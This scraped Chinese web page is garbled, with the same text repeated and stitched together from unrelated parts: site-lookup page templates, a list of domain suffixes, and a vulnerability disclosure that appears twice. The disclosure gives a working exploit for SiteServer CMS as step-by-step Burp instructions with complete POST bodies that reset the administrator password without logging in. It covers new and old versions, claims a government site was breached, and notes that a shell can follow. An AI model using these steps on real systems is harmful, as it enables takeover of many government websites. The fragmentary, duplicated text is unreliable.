www.zglzglzgdc ccsdc.org.cn网站属于什么性质,其网站内部工作人员的真伪,政府是否有该部门。

document.write('&&&&');
请输入你要查询的地址:
更新TKD缓存
廉政调查,廉政新闻,执法监察,党风建设 -中国廉政调查(www.zglzgcw.org)
三月平均:&&ALEXA数据预估流量:相关数据不充分,无法统计。
PR &&&&&&百度权重 &&&&&&&&&&&&&&首页位置 &&&&&&外链
百度索引量:1,775&&预计来路:&IP&&&&&&386
本站反链:--条
该网站IP:-- 地址:-- 有约 -- 个站点运行在此服务器上
廉政调查,廉政新闻,执法监察,党风建设 -中国廉政调查(www.zglzgcw.org)
一般不超过80个字符
网站关键词
廉政新闻,廉政调查,廉政建设,执法监察,廉政广角,廉政文化,党风建设,反腐倡廉,和谐生活,举报投诉,图说廉政,廉政视频,廉政专题
一般不超过100个字符
中国廉政调查,廉政调查,廉政新闻,执法监察,党风建设 -中国廉政调查网(www.zglzgcw.org)
一般不超过200个字符
关键词排名分析
数据载入中,请稍候。
数据载入中,请稍候。
最近查询:
其他功能:
& 爱站网 版权所有
About Aizhan分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
某政府网站大量使用的CMS直接修改管理员密码,无需登陆,无视密码提问,涉及众多政府网站,官网最新版,以及某个ZF网站测试成功!
详细说明:
本来想给“百容千域软件技术开发有限责任公司”,看厂商一直忽略,就这么公开会对大量ZF站点有较大影响,不想被查水表……
就交由CNCERT转交吧!至于用户量,直接看官网ZF案例就知道了:/case/54.html
这里首先要这样做:
随便访问一个页面,比如http://cms./siteserver/login.aspx
用burp代理,之后数据包就在这个上面修改
1.要改密码,我们首先要有管理员的用户名,那就把上面的包改为
/siteserver/userRole/background_administrator.aspx
这里就是超级管理员的用户名了
--------------------------------------
2.然后我们获取下表单提交所需的__EVENTVALIDATION 和 __VIEWSTATE
/siteserver/userRole/modal_userPassword.aspx?IsAdmin=True&UserName=siteserver
这里的username就是管理员账户名
然后构造为如下内容,__EVENTVALIDATION 和 __VIEWSTATE来自上面那个数据包,记得url编码下:
code 区域__EVENTTARGET=btnSubmit
&__EVENTARGUMENT=
&__VIEWSTATE=%2FwEPDwULLTE1OTkwOTIyMjQPZBYCAg4PZBYCAgcPDxYCHgRUZXh0BQpzaXRlc2VydmVyZGRkipls%2FDTqNvbpG1kLvyDEv0bu4wY%3D
&Password=123123
&ConfirmPassword=123123
&__EVENTVALIDATION=%2FwEWBALFupG9AQLCi9reAwLSxeCRDwLK0IHXARrXdbV3buSwdVedwI9%2BUfSrTiW2
--------------------------------------
3.在原本这个数据包上使用change request method,将get变为post,如下
POST地址中的username与之前一致:
/siteserver/userRole/modal_userPassword.aspx?IsAdmin=True&UserName=siteserver
内容为我们刚才构造的:
__EVENTTARGET=btnSubmit&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE1OTkwOTIyMjQPZBYCAg4PZBYCAgcPDxYCHgRUZXh0BQpzaXRlc2VydmVyZGRkipls%2FDTqNvbpG1kLvyDEv0bu4wY%3D&Password=123123&ConfirmPassword=123123&__EVENTVALIDATION=%2FwEWBALFupG9AQLCi9reAwLSxeCRDwLK0IHXARrXdbV3buSwdVedwI9%2BUfSrTiW2
点击提交,返回302:
然后我们去登录页面用密码123123登录,成功:
然后~~就进去了呗~~~
漏洞证明:
----------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
注意:老版本的位置不一样,比如:
老版本获取管理列表的页面是:
/siteserver/platform/background_administrator.aspx?module=cms&menuID=UserRole&isPlatform=True&title=123
获取表单的地址是:
/siteserver/usercenter/modal_userPassword.aspx?IsAdmin=True&UserName=admin
最终提交修改的地址是:
/siteserver/usercenter/modal_userPassword.aspx?IsAdmin=True&UserName=admin
不过内容是一样的:
code 区域__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE3MDQ5OTk4MDYPZBYCAgQPZBYKAgUPZBYCZg9kFgRmD2QWAgIBDw9kFgIeB29uY2xpY2sFOGlmIChfX0hlbHBfT25DbGljaygnY3RsMDFfY3RsMDBfcG5sSGVscCcpKSByZXR1cm4gZmFsc2U7FgJmDw8WAh4NQWx0ZXJuYXRlVGV4dAUe6ZyA6KaB6YeN6K6%2B5a%2BG56CB55qE55So5oi35ZCNZGQCAg8PZBYCHgVzdHlsZQUNZGlzcGxheTpub25lO2QCBw8PFgIeBFRleHQFBWFkbWluZGQCCQ9kFgJmD2QWBGYPZBYCAgEPD2QWAh8ABThpZiAoX19IZWxwX09uQ2xpY2soJ2N0bDAyX2N0bDAwX3BubEhlbHAnKSkgcmV0dXJuIGZhbHNlOxYCZg8PFgIfAQUe6L6T5YWl6ZyA6KaB6K6%2B572u55qE5paw5a%2BG56CBZGQCAg8PZBYCHwIFDWRpc3BsYXk6bm9uZTtkAg8PZBYCZg9kFgRmD2QWAgIBDw9kFgIfAAU4aWYgKF9fSGVscF9PbkNsaWNrKCdjdGwwNF9jdGwwMF9wbmxIZWxwJykpIHJldHVybiBmYWxzZTsWAmYPDxYCHwEFFeWGjeasoei%2Bk%2BWFpeaWsOWvhueggWRkAgIPD2QWAh8CBQ1kaXNwbGF5Om5vbmU7ZAIXDw9kFgIfAAUbd2luZG93LnBhcmVudC5oaWRlUG9wV2luKCk7ZGTejZAB03%2FCQocxpwTAZM0CoxsQyg%3D%3D&__EVENTVALIDATION=%2FwEWCALEivuXCgKZj7yyCgLC6MKyCgLSxeCRDwK0w8ayCgLK0IHXAQK8w4S2BAKMm%2BWyB%2FOhXjqHMeqSEd4aGFg0M1HejJ7q&Password=admin&ConfirmPassword=admin&Submit=%E4%BF%AE+%E6%94%B9
然后就进了一个老版本的政府站(新版本在上面已经说明)
进了后台能做很多事,比如拿shell:
修复方案:
验证修改密码权限以及安全提问
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:11
确认时间: 10:02
厂商回复:
对于较强认证前提的安全风险,CNVD未直接进行实例复现或本地复现,根据所述过程和原理进行认定。由CNVD尝试联系软件生产厂商处置。
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
这个给力。。。
登录后才能发表评论,请先分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
某政府网站大量使用的CMS直接修改管理员密码,无需登陆,无视密码提问,涉及众多政府网站,官网最新版,以及某个ZF网站测试成功!
详细说明:
本来想给“百容千域软件技术开发有限责任公司”,看厂商一直忽略,就这么公开会对大量ZF站点有较大影响,不想被查水表……
就交由CNCERT转交吧!至于用户量,直接看官网ZF案例就知道了:/case/54.html
这里首先要这样做:
随便访问一个页面,比如http://cms./siteserver/login.aspx
用burp代理,之后数据包就在这个上面修改
1.要改密码,我们首先要有管理员的用户名,那就把上面的包改为
/siteserver/userRole/background_administrator.aspx
这里就是超级管理员的用户名了
--------------------------------------
2.然后我们获取下表单提交所需的__EVENTVALIDATION 和 __VIEWSTATE
/siteserver/userRole/modal_userPassword.aspx?IsAdmin=True&UserName=siteserver
这里的username就是管理员账户名
然后构造为如下内容,__EVENTVALIDATION 和 __VIEWSTATE来自上面那个数据包,记得url编码下:
code 区域__EVENTTARGET=btnSubmit
&__EVENTARGUMENT=
&__VIEWSTATE=%2FwEPDwULLTE1OTkwOTIyMjQPZBYCAg4PZBYCAgcPDxYCHgRUZXh0BQpzaXRlc2VydmVyZGRkipls%2FDTqNvbpG1kLvyDEv0bu4wY%3D
&Password=123123
&ConfirmPassword=123123
&__EVENTVALIDATION=%2FwEWBALFupG9AQLCi9reAwLSxeCRDwLK0IHXARrXdbV3buSwdVedwI9%2BUfSrTiW2
--------------------------------------
3.在原本这个数据包上使用change request method,将get变为post,如下
POST地址中的username与之前一致:
/siteserver/userRole/modal_userPassword.aspx?IsAdmin=True&UserName=siteserver
内容为我们刚才构造的:
__EVENTTARGET=btnSubmit&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE1OTkwOTIyMjQPZBYCAg4PZBYCAgcPDxYCHgRUZXh0BQpzaXRlc2VydmVyZGRkipls%2FDTqNvbpG1kLvyDEv0bu4wY%3D&Password=123123&ConfirmPassword=123123&__EVENTVALIDATION=%2FwEWBALFupG9AQLCi9reAwLSxeCRDwLK0IHXARrXdbV3buSwdVedwI9%2BUfSrTiW2
点击提交,返回302:
然后我们去登录页面用密码123123登录,成功:
然后~~就进去了呗~~~
漏洞证明:
----------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
注意:老版本的位置不一样,比如:
老版本获取管理列表的页面是:
/siteserver/platform/background_administrator.aspx?module=cms&menuID=UserRole&isPlatform=True&title=123
获取表单的地址是:
/siteserver/usercenter/modal_userPassword.aspx?IsAdmin=True&UserName=admin
最终提交修改的地址是:
/siteserver/usercenter/modal_userPassword.aspx?IsAdmin=True&UserName=admin
不过内容是一样的:
code 区域__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE3MDQ5OTk4MDYPZBYCAgQPZBYKAgUPZBYCZg9kFgRmD2QWAgIBDw9kFgIeB29uY2xpY2sFOGlmIChfX0hlbHBfT25DbGljaygnY3RsMDFfY3RsMDBfcG5sSGVscCcpKSByZXR1cm4gZmFsc2U7FgJmDw8WAh4NQWx0ZXJuYXRlVGV4dAUe6ZyA6KaB6YeN6K6%2B5a%2BG56CB55qE55So5oi35ZCNZGQCAg8PZBYCHgVzdHlsZQUNZGlzcGxheTpub25lO2QCBw8PFgIeBFRleHQFBWFkbWluZGQCCQ9kFgJmD2QWBGYPZBYCAgEPD2QWAh8ABThpZiAoX19IZWxwX09uQ2xpY2soJ2N0bDAyX2N0bDAwX3BubEhlbHAnKSkgcmV0dXJuIGZhbHNlOxYCZg8PFgIfAQUe6L6T5YWl6ZyA6KaB6K6%2B572u55qE5paw5a%2BG56CBZGQCAg8PZBYCHwIFDWRpc3BsYXk6bm9uZTtkAg8PZBYCZg9kFgRmD2QWAgIBDw9kFgIfAAU4aWYgKF9fSGVscF9PbkNsaWNrKCdjdGwwNF9jdGwwMF9wbmxIZWxwJykpIHJldHVybiBmYWxzZTsWAmYPDxYCHwEFFeWGjeasoei%2Bk%2BWFpeaWsOWvhueggWRkAgIPD2QWAh8CBQ1kaXNwbGF5Om5vbmU7ZAIXDw9kFgIfAAUbd2luZG93LnBhcmVudC5oaWRlUG9wV2luKCk7ZGTejZAB03%2FCQocxpwTAZM0CoxsQyg%3D%3D&__EVENTVALIDATION=%2FwEWCALEivuXCgKZj7yyCgLC6MKyCgLSxeCRDwK0w8ayCgLK0IHXAQK8w4S2BAKMm%2BWyB%2FOhXjqHMeqSEd4aGFg0M1HejJ7q&Password=admin&ConfirmPassword=admin&Submit=%E4%BF%AE+%E6%94%B9
然后就进了一个老版本的政府站(新版本在上面已经说明)
进了后台能做很多事,比如拿shell:
修复方案:
验证修改密码权限以及安全提问
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:11
确认时间: 10:02
厂商回复:
对于较强认证前提的安全风险,CNVD未直接进行实例复现或本地复现,根据所述过程和原理进行认定。由CNVD尝试联系软件生产厂商处置。
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
这个给力。。。
登录后才能发表评论,请先document.write('&&&&');
请输入你要查询的地址:
更新TKD缓存
三月平均:&&ALEXA数据预估流量:相关数据不充分,无法统计。
PR &&&&&&百度权重 &&&&&&&&&&&&&&首页位置 &&&&&&外链
百度索引量:&&预计来路:&IP&&&&&&个
本站反链:--条
该网站IP:-- 地址:-- 有约 -- 个站点运行在此服务器上
一般不超过80个字符
网站关键词
一般不超过100个字符
一般不超过200个字符
关键词排名分析
数据载入中,请稍候。
数据载入中,请稍候。
最近查询:&&&&&&&&&&&&&&&&&&&&
其他功能:
& 爱站网 版权所有
About Aizhan今天看啥 热点:
com --- Commercial organizations,商业组织,公司 net --- Network operations and service centers,网络服务商 org --- Other organizations,非盈利组织 int --- International organizations,国际组织 edu --- Educational institutions (U.S),(美国)教研机构 gov --- Governmental entities (U.S),(美国)政府部门 mil --- Military (U.S),(美国)军事机构 arpa --- Come from ARPANet,由ARPANET(美国国防部高级研究计划局建立的计算机网)沿留的名称,被用于互联网内部功能 biz --- web business guide,网络商务向导,适用于商业公司(注:biz是business的习惯缩用) info --- infomation,提供信息服务的企业 name --- name,适用于个人注册的通用顶级域名 pro --- professional,适用于医生、律师、会计师等专业人员的通用顶级域名 coop --- cooperation,适用于商业合作社的专用顶级域名 aero --- aero,适用于航空运输业的专用顶级域名 museum --- museum,适用于博物馆的专用顶级域名
公益性质的网站
行政机关政府部门的域名
org --- Other zations,非盈利组织
相关搜索:
相关阅读:
相关频道:
电脑知识最近更新

我要回帖

更多关于 www.ydc111.org 的文章

 

随机推荐